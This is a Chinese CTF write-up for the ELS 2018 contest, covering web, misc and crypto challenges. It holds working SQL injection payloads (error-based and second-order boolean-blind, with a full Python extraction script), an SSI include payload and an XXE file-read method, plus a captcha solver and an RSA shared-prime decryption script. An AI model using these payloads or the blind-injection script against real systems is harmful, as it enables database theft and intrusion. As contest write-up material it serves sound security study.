ELS_2018_WriteUp

WEB

SimpleBBS

登录界面随手尝试输入单引号,引发了数据库报错——说明输入被直接拼进了 SQL 语句。

随即尝试报错注入

1' and (extractvalue(1,concat(0x7e,database(),0x7e)))#

成功爆出数据库,下面就是常规注入了

1' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1),0x7e)))#

由于 extractvalue() 的报错信息最多只回显 32 个字符,flag 较长时要用 substr 分段截取,再拼起来得到完整 flag。

1' and (extractvalue(1,concat(0x7e,(select substr(flag,20,40) from flag limit 0,1),0x7e)))#

SimpleServerInjection

hint:SimpleServerInjection, SSI, flag in current directory

SSI(Server Side Includes,服务器端包含)注入:当页面把用户输入原样写进由服务器解析的 SSI 文件(如 .shtml)时,可以注入 <!--#include --> 之类的指令读取文件甚至执行命令。

https://www.secpulse.com/archives/66934.html

根据文章的payload :

<!--#include virtual="flag" -->

SimpleExtensionExplorerInjection

提示XXE, /flag。

直接尝试XXE进行读文件

需要把请求的 Content-Type 改为 application/xml,让后端按 XML 解析请求体;然后在 DOCTYPE 中声明一个指向 file:///flag 的外部实体并在正文中引用,响应里就会带出文件内容。

SimplePrintEventLogger

hint:same server as SimpleExtensionExploreInjection , RCE, flag in /

和上一题同样的环境,flag在根目录下。

还是用上题的payload

直接读到根目录,有个flagvvvvvaaaagegsgag2333文件

然后读flagvvvvvaaaagegsgag2333

(和RCE有什么关系?非预期了吗)

SimpleBlog

随便登录进去之后看到提示二次注入和文件包含。

经过一波尝试发现

注册一个 a' 账户,无论怎么点题目都是 0 分。

但是注册一个 a' # 账户,点题会有分数出现:说明用户名入库后在计分时又被原样拼进了 SQL(二次注入)——a' 让语句语法出错、得分为 0,而 a' # 闭合了引号并把后面的内容注释掉,语句正常执行。由此可以构造 bool 盲注。

1' and if(1,exp(999999999999),1)#

exp(999999999999) 的结果超出 DOUBLE 的表示范围,MySQL 会报错并中止整条语句,于是分数显示为 0。

1' and if(0,exp(999999999999),1)#

如果语句正常执行不报错,分数会正常显示。

这样就构成了bool盲注。

编写脚本

# encoding=utf-8
import requests

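def reg(name):
    """Register a throwaway account whose username carries the SQL payload.

    The username is stored as-is and later spliced into the grading query
    (second-order injection), so the payload only has to survive registration.

    Args:
        name: username to register; this is the injected SQL fragment.

    Returns:
        The PHPSESSID the server assigns to the new account, read from the
        parsed cookie jar. The original sliced the raw Set-Cookie header with
        ``[10:-8]``, which silently returns garbage as soon as the server adds
        or reorders a cookie attribute (Path, HttpOnly, ...).

    Raises:
        KeyError: if the response sets no PHPSESSID cookie.
    """
    url = "http://210.32.4.20/register.php"
    data = {
        'username': name,
        'password': '123456',
    }
    r = requests.post(url=url, data=data)
    return r.cookies['PHPSESSID']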

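def log(name, cookie):
    """Log in as *name* with session *cookie*, answer one question, read the grade.

    Args:
        name: the registered username (the injected SQL fragment).
        cookie: PHPSESSID returned by ``reg`` for that account.

    Returns:
        True when the grade page says ``Your grades is 0`` — the injected
        condition held, ``exp()`` overflowed and the grading query errored
        out — False when a real grade came back. Truthy/falsy exactly like
        the original's 1/0.

    The substring test runs on ``r.text``; the original used ``r.content``,
    which is ``bytes`` on Python 3 and raises TypeError against a str needle.
    """
    cookies = {
        'PHPSESSID': cookie,
    }
    data = {
        'username': name,
        'password': '123456',
    }
    requests.post(url='http://210.32.4.20/login.php', data=data, cookies=cookies)
    # Ticking a single checkbox is enough to make the server run the grading query.
    r = requests.post(url='http://210.32.4.20/answer.php', data={'1.a': 'on'}, cookies=cookies)
    return 'Your grades is 0' in r.text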
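def extract_flag(max_len=1000):
    """Recover ``flag.flag`` one byte at a time through the second-order blind injection.

    For every position a fresh account is registered whose username embeds the
    boolean condition; a grade of 0 after login means the condition was true
    and ``exp()`` blew up the grading query. Extraction stops at the first
    position where no printable byte matches, i.e. past the end of the flag,
    instead of burning ~94 registrations per position up to *max_len*.

    Bug fixed: the original iterated ``for j in (33, 127)`` — a two-element
    tuple, so only ``!`` and DEL were ever tried — where ``range(33, 127)``
    was meant.

    Args:
        max_len: upper bound on the flag length to probe (positions 1..max_len-1).

    Returns:
        The recovered flag string (possibly empty if nothing matched).
    """
    flag = ''
    for i in range(1, max_len):
        for j in range(33, 127):
            payload = (
                "1' and if((ascii(substr((select flag from flag limit 0,1),%d,1))=%d),"
                "exp(999999999999),1)#" % (i, j)
            )
            if log(payload, reg(payload)):
                flag += chr(j)
                print(flag)
                break
        else:
            break  # no candidate matched this position: end of the flag
    return flag


if __name__ == '__main__':
    extract_flag()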

根据提示,flag 在 flag 表的 flag 字段中,脚本里的 select flag from flag 即据此构造。

misc

gogogo

流量包追踪tcp流

保存照片得到flag。

checkin

验证码识别题

由于数量大并且有时间限制,考虑跑脚本来进行自动识别。首先需要写一个 training.py,收集验证码供人工识别,产生一个训练集:

import pwn

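HOST, PORT = '210.32.4.14', 13373
TRAINING_SET = 'trainingset.txt'
ROWS, GLYPHS, GLYPH_WIDTH = 10, 6, 18


def glyph_at(lines, no):
    """Cut glyph *no* out of the captcha rows as one newline-terminated block.

    Each glyph is an 18-column slice of all 10 rows; this block is what gets
    compared against and stored in the training set, so the recogniser must
    build it the same way.
    """
    start, stop = GLYPH_WIDTH * no, GLYPH_WIDTH * (no + 1)
    return ''.join(row[start:stop] + '\n' for row in lines)


def label_line(key, glyph):
    """Serialise one label as ``key=<hex of glyph>#`` so the multi-line glyph fits one line."""
    return '%s=%s#\n' % (key, glyph.encode('latin-1').hex())


def read_captcha(io):
    """Return the ROWS lines of ASCII art that follow the banner."""
    # Ported to Python 3: pwntools now returns bytes. latin-1 is a lossless
    # byte<->str mapping, so glyphs round-trip through the hex file exactly.
    return [io.recvline().decode('latin-1') for _ in range(ROWS)]


def collect(needed=36, max_idle=20):
    """Fetch captchas until *needed* labels have been typed in; return {char: glyph}.

    One fresh connection per captcha. Gives up after more than *max_idle*
    consecutive captchas that produced no new label.
    """
    labels = {}
    labeled = 0
    idle = 0
    while labeled < needed:
        got_new = False
        io = pwn.remote(HOST, PORT)
        try:
            for _ in range(3):          # banner
                io.recvline()
            lines = read_captcha(io)
            for no in range(GLYPHS):
                glyph = glyph_at(lines, no)
                # The original broke out of the whole captcha on the first
                # already-known glyph and reconnected; skipping just that
                # glyph lets the remaining ones be labelled on the same round.
                if glyph in labels.values():
                    continue
                print(glyph)
                ans = input()
                if not ans:                 # original raised IndexError here
                    continue
                labels[ans[0]] = glyph
                labeled += 1
                got_new = True
        finally:
            io.close()                      # original leaked the socket on the bail-out path
        idle = 0 if got_new else idle + 1
        if idle > max_idle:
            break
        print('%d pictures have been labeled. ' % labeled)
    return labels


def save_labels(labels, path=TRAINING_SET):
    """Write the training set, one ``label_line`` per glyph."""
    with open(path, 'wt') as f:
        f.writelines(label_line(key, glyph) for key, glyph in labels.items())


if __name__ == '__main__':
    save_labels(collect())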

然后开始自动识别

import pwn

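HOST, PORT = '210.32.4.14', 13373
TRAINING_SET = 'trainingset.txt'
ROWS, GLYPHS, GLYPH_WIDTH = 10, 6, 18


def glyph_at(lines, no):
    """Cut glyph *no* out of the captcha rows as one newline-terminated block.

    Must match training.py exactly: an 18-column slice of all 10 rows, each
    row followed by a newline.
    """
    start, stop = GLYPH_WIDTH * no, GLYPH_WIDTH * (no + 1)
    return ''.join(row[start:stop] + '\n' for row in lines)


def label_line(key, glyph):
    """Serialise one label as ``key=<hex of glyph>#`` (training.py format)."""
    return '%s=%s#\n' % (key, glyph.encode('latin-1').hex())


def parse_label_line(line):
    """Inverse of ``label_line``: ``'a=78790a#\\n'`` -> ``('a', 'xy\\n')``.

    Returns None for a blank line so a stray empty line in the file is harmless.
    The key is always the first character and the hex body starts after ``=``.
    """
    line = line.rstrip('\n')
    if not line:
        return None
    return line[0], bytes.fromhex(line[2:].rstrip('#')).decode('latin-1')


def load_labels(path=TRAINING_SET):
    """Read the training set written by training.py into {char: glyph}."""
    labels = {}
    with open(path, 'rt') as f:
        for line in f:
            parsed = parse_label_line(line)
            if parsed:
                labels[parsed[0]] = parsed[1]
    return labels


def lookup(labels, glyph):
    """Return the char labelled with *glyph*, or None if it is unknown."""
    for key, known in labels.items():
        if known == glyph:
            return key
    return None


def solve(rounds=20, path=TRAINING_SET):
    """Answer *rounds* captchas in one session, asking the user for unseen glyphs.

    New labels are appended to the training set immediately so they survive a
    crash; the original opened the file for append and never closed it.
    """
    labels = load_labels(path)
    io = pwn.remote(HOST, PORT)
    try:
        for _ in range(3):          # banner
            io.recvline()
        for _ in range(rounds):
            lines = [io.recvline().decode('latin-1') for _ in range(ROWS)]
            answer = ''
            for no in range(GLYPHS):
                glyph = glyph_at(lines, no)
                char = lookup(labels, glyph)
                if char is None:
                    print(glyph)
                    typed = input()
                    while not typed:    # original raised IndexError on an empty line
                        typed = input()
                    char = typed[0]
                    labels[char] = glyph
                    with open(path, 'at') as f:
                        f.write(label_line(char, glyph))
                answer += char
            io.recvuntil(b'your captcha: ')
            io.sendline(answer.encode('latin-1'))
        print(io.recvall().decode('latin-1'))
    finally:
        io.close()


if __name__ == '__main__':
    solve()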

拿到flag

CRYPTO

AzureRSA

# Challenge handout (AzureRSA), not a runnable script: the same flag is
# encrypted under two 1024-bit moduli. flag, p1, q1, p2, q2 are the unknowns;
# the asserts describe the key material. Python 2 long literals (trailing L).
n1=0xcfc59d54b4b2e9ab1b5d90920ae88f430d39fee60d18dddbc623d15aae645e4e50db1c07a02d472b2eebb075a547618e1154a15b1657fbf66ed7e714d23ac70bdfba4c809bbb1e27687163cb09258a07ab2533568192e29a3b8e31a5de886050b28b3ed58e81952487714dd7ae012708db30eaf007620cdeb34f150836a4b723L
e1=0xfae3aL
c1=0x81523a330fb15125b6184e4461dadac7601340960840c5213b67a788c84aecfcdc3caf0bf3e27e4c95bb3c154db7055376981972b1565c22c100c47f3fa1dd2994e56090067b4e66f1c3905f9f780145cdf8d0fea88a45bae5113da37c8879c9cdb8ee9a55892bac3bae11fbbabcba0626163d0e2e12c04d99f4eeba5071cbeaL
n2=0xd45304b186dc82e40bd387afc831c32a4c7ba514a64ae051b62f483f27951065a6a04a030d285bdc1cb457b24c2f8701f574094d46d8de37b5a6d55356d1d368b89e16fa71b6603bd037c7f329a3096ce903937bb0c4f112a678c88fd5d84016f745b8281aea8fd5bcc28b68c293e4ef4a62a62e478a8b6cd46f3da73fa34c63L
e2=0x1f9eaeL
c2=0x4d7ceaadf5e662ab2e0149a8d18a4777b4cd4a7712ab825cf913206c325e6abb88954ebc37b2bda19aed16c5938ac43f43966e96a86913129e38c853ecd4ebc89e806f823ffb802e3ddef0ac6c5ba078d3983393a91cd7a1b59660d47d2045c03ff529c341f3ed994235a68c57f8195f75d61fc8cac37e936d9a6b75c4bd2347L
assert pow(flag,e1,n1)==c1
assert pow(flag,e2,n2)==c2
# e1 and e2 are NOT coprime to phi(n): there is no private exponent d with
# e*d == 1 (mod phi), so textbook RSA decryption does not apply directly.
assert gcd(e1,(p1-1)*(q1-1))==14
assert gcd(e2,(p2-1)*(q2-1))==14

解密思路:两个模数共用一个素因子,p = gcd(n1, n2) 直接分解出 n1、n2。由于 gcd(e_i, φ(n_i)) = 14,e_i 在模 φ(n_i) 下没有逆元,只能先除掉公因子 14 再求逆,得到的是 m^14 mod n_i 而不是 m。把 m^14 在 p、q1、q2 下用 CRT 合并后对 q1·q2 取模,利用 7 与 (q1-1)(q2-1) 互素求模 7 次根得到 m^2 mod q1·q2,最后开整数平方根得到 m——这一步成立的前提是 flag 足够短,使 m^2 < q1·q2。解密脚本:

import gmpy2
from libnum import *
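# Stdlib-only port of the solve script (original used gmpy2 + libnum):
# math.gcd / math.isqrt, pow(x, -1, m) for modular inverses (Python 3.8+),
# a small CRT helper and int.to_bytes in place of libnum's n2s.
import math

n1 = 0xcfc59d54b4b2e9ab1b5d90920ae88f430d39fee60d18dddbc623d15aae645e4e50db1c07a02d472b2eebb075a547618e1154a15b1657fbf66ed7e714d23ac70bdfba4c809bbb1e27687163cb09258a07ab2533568192e29a3b8e31a5de886050b28b3ed58e81952487714dd7ae012708db30eaf007620cdeb34f150836a4b723
e1 = 0xfae3a
c1 = 0x81523a330fb15125b6184e4461dadac7601340960840c5213b67a788c84aecfcdc3caf0bf3e27e4c95bb3c154db7055376981972b1565c22c100c47f3fa1dd2994e56090067b4e66f1c3905f9f780145cdf8d0fea88a45bae5113da37c8879c9cdb8ee9a55892bac3bae11fbbabcba0626163d0e2e12c04d99f4eeba5071cbea
n2 = 0xd45304b186dc82e40bd387afc831c32a4c7ba514a64ae051b62f483f27951065a6a04a030d285bdc1cb457b24c2f8701f574094d46d8de37b5a6d55356d1d368b89e16fa71b6603bd037c7f329a3096ce903937bb0c4f112a678c88fd5d84016f745b8281aea8fd5bcc28b68c293e4ef4a62a62e478a8b6cd46f3da73fa34c63
e2 = 0x1f9eae
c2 = 0x4d7ceaadf5e662ab2e0149a8d18a4777b4cd4a7712ab825cf913206c325e6abb88954ebc37b2bda19aed16c5938ac43f43966e96a86913129e38c853ecd4ebc89e806f823ffb802e3ddef0ac6c5ba078d3983393a91cd7a1b59660d47d2045c03ff529c341f3ed994235a68c57f8195f75d61fc8cac37e936d9a6b75c4bd2347


def crt(residues, moduli):
    """Chinese remainder theorem for pairwise coprime *moduli*.

    Returns the unique x in [0, prod(moduli)) with x == residues[i] (mod moduli[i]).
    """
    total_mod = math.prod(moduli)
    x = 0
    for r, mod in zip(residues, moduli):
        cofactor = total_mod // mod
        x += r * cofactor * pow(cofactor, -1, mod)
    return x % total_mod


# The two moduli share a prime factor, so one gcd splits both at once.
p = math.gcd(n1, n2)
if p == 1 or p == n1:
    raise ValueError("n1 and n2 do not share a proper prime factor")
q1 = n1 // p
q2 = n2 // p
phi1 = (p - 1) * (q1 - 1)
phi2 = (p - 1) * (q2 - 1)

# gcd(e_i, phi_i) == 14 (challenge asserts), so e_i has no inverse mod phi_i.
# Divide out the common factor g = gcd(e1, e2) = 14 and invert the rest:
# c_i ** d_i == m ** g (mod n_i), i.e. we recover m^14, not m.
g = math.gcd(e1, e2)
d1 = pow(e1 // g, -1, phi1)
d2 = pow(e2 // g, -1, phi2)
m1 = pow(c1, d1, n1)  # m^14 mod n1
m2 = pow(c2, d2, n2)  # m^14 mod n2

# Combine m^14 mod q1, mod q2 and mod p into m^14 mod p*q1*q2 (the original
# printed this intermediate), then reduce to the modulus q1*q2.
m_g = crt([m1 % q1, m2 % q2, m1 % p], [q1, q2, p])
print(m_g)
n = q1 * q2
phi = (q1 - 1) * (q2 - 1)
# 14 = 2 * 7. 7 is coprime to phi, so a modular 7th root leaves m^2 mod n ...
d7 = pow(7, -1, phi)
m_sq = pow(m_g % n, d7, n)
# ... and an integer square root recovers m itself. This only works because
# the flag is short enough that m^2 < n; otherwise m_sq is not a perfect square.
m = math.isqrt(m_sq)
if m * m != m_sq:
    raise ValueError("m^2 mod n is not a perfect square: flag too long for this trick")
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))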